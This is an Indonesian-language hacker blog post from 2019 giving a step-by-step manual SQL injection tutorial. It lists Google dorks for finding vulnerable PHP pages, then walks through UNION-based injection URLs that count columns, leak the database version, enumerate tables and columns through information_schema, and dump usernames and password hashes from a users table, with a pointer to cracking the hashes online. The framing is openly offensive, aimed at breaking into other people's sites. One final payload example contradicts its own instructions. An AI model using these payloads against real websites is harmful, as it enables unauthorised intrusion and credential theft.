Manual Sql Injection by AnonMosT
Monday, August 26, 2019
Edit
Assalamualaikum, samlekum , P, shalom , saya AnonMosT di artikel ini saya akan menjelaskan bagaimana caranya menexploitasi web dengan cara sqli manual , gak usah bacod langsung ke tutor yekan :v
Siapkan dork disini saya kasih contoh aja , selanjutnya bisa kalian kembangkan dengan otak mesum kalian
Dork:
intext:"Powered by Alsovalue"inurl:/.php?id=
inurl:pageid=
inurl:games.php?id=
inurl:page.php?file=
Dorking dulu yekan abis itu kalian kalau mau cek vuln apa engga nya tinggal tambahkan ' pada ujung url contohnya gini ya beb :v
www.abcdefgh.com/page.php?id=12'
Nah jika ada tulisan Error in my SQL atau sebagai nya berarti vuln ya
Setelah itu tambahkan
+order+by+1--
Misalkan:
www.abcdefgh.com/page.php?id=12+order+by+1--
Nah jika belum ketemu Error nya kalian lanjutkan menjadi
www.abcdefgh.com/page.php?id=12+order+by+2--
Nah misalkan Error nya di angka 10 maka colum nya ada 9 ( contohnya error bertuliskan , nothing colums 10 the web/server)
Nah berarti colum nya ada 9 maka kita tambahkan +union+select+
Misalkan
www.abcdefgh.com/page.php?id=-12+union+select+1,2,3,4,5,6,7,8,9--
Jangan lupa tambahin - dibelakang angka yg ada setelah =
Coba lihat angka 12 , di belakang nya ada -
Nah misalkan angka yg keluar itu angka 4 nah maka angka 4 itu kalian ganti dengan
@@version
Contohnya
www.abcdefgh.com/page.php?id=-12+union+select+1,2,3,@@version,5,6,7,8,9--
Jika versi 5 keatas kalian bisa melanjutkan karena ini mudah :v
@@version ganti yekan sama group_concat(table_name)
Dan angka akhir ganti ama
+from+information_schema.tables+where+table_schema=database()
Contohnya
www.abcdefgh.com/page.php?id=-12+union+select+1,2,3,group_concat(table_name),5,6,7,8,9+from+information_schema.tables+where+table_schema=database()--
Setelahnya kalian akan dapat nama.nama table di web tersebut
Misalkan
users,dosen,news,page,
Nah kalian cari tab yg menurut kalian itu tab admin ,.misalkan tab users adalah tab admin
Lalu kalian ganti
group_concat(table_name) dengan
group_concat(column_name)
Dan
+from+information_schema.tables+where+table_schema=database() gantikan dengan
+from+information_schema.columns+where+table_name=
Mengapa database() tidak tercantum? Database() kita ubah dengan nama table yg sudah di ganti dengan huruf decimal/ASCII
Kalian bisa mendownload aplikasi ASCII converter atau di website yang menyediakan ASCII misalkan users jika diubah jadi 117 115 101 114 115 dan jangan lupa di tambahkan CHAR setelah = dan , setelah angka decimal
Jadi contohnya begini
www.abcdefgh.com/page.php?id=-12+union+select+1,2,3,group_concat(column_name),5,6,7,8,9+from+information_schema.columns+where+table_name=CHAR(117, 115, 101, 114, 115)--
Setelah itu kalian akan dapat nama² dari isi tabel users
Contohnya
user,pass,login,cc,kegiatan,dashboard
Nah username dan password nya pasti ada di table user dan pass
Untuk melihatnya
Ganti
group_concat(column_name) dengan
group_concat(user,0x3a,pass) user dan pass adalah nama table yg menyimpan user dan password jika table yg menyimpan usser dan pw berbeda silahkan ganti
Dan juga
+from+information_schema.columns+where+table_name=CHAR(117, 115, 101, 114, 115)--
Ganti dengan from+users
Jadi contohnya
www.abcdefgh.com/page.php?id=-12+union+select+1,2,3,group_concat(column_name),5,6,7,8,9+from+users--
Misalkan
Usser: dosen345
Password: e4d909c290d0fb1ca068ffaddf22cbd0
Jika masih dalam bentuk kode kalian bisa hash di crackstation.net
Untuk mencari adlog kalian bisa mencari di aplikasi anon hackbar
Terimakasih telah membaca artikel ini maaf jika ada kesalahan karena saya ketik ini di malam hari
Thanks to Attacker Network Team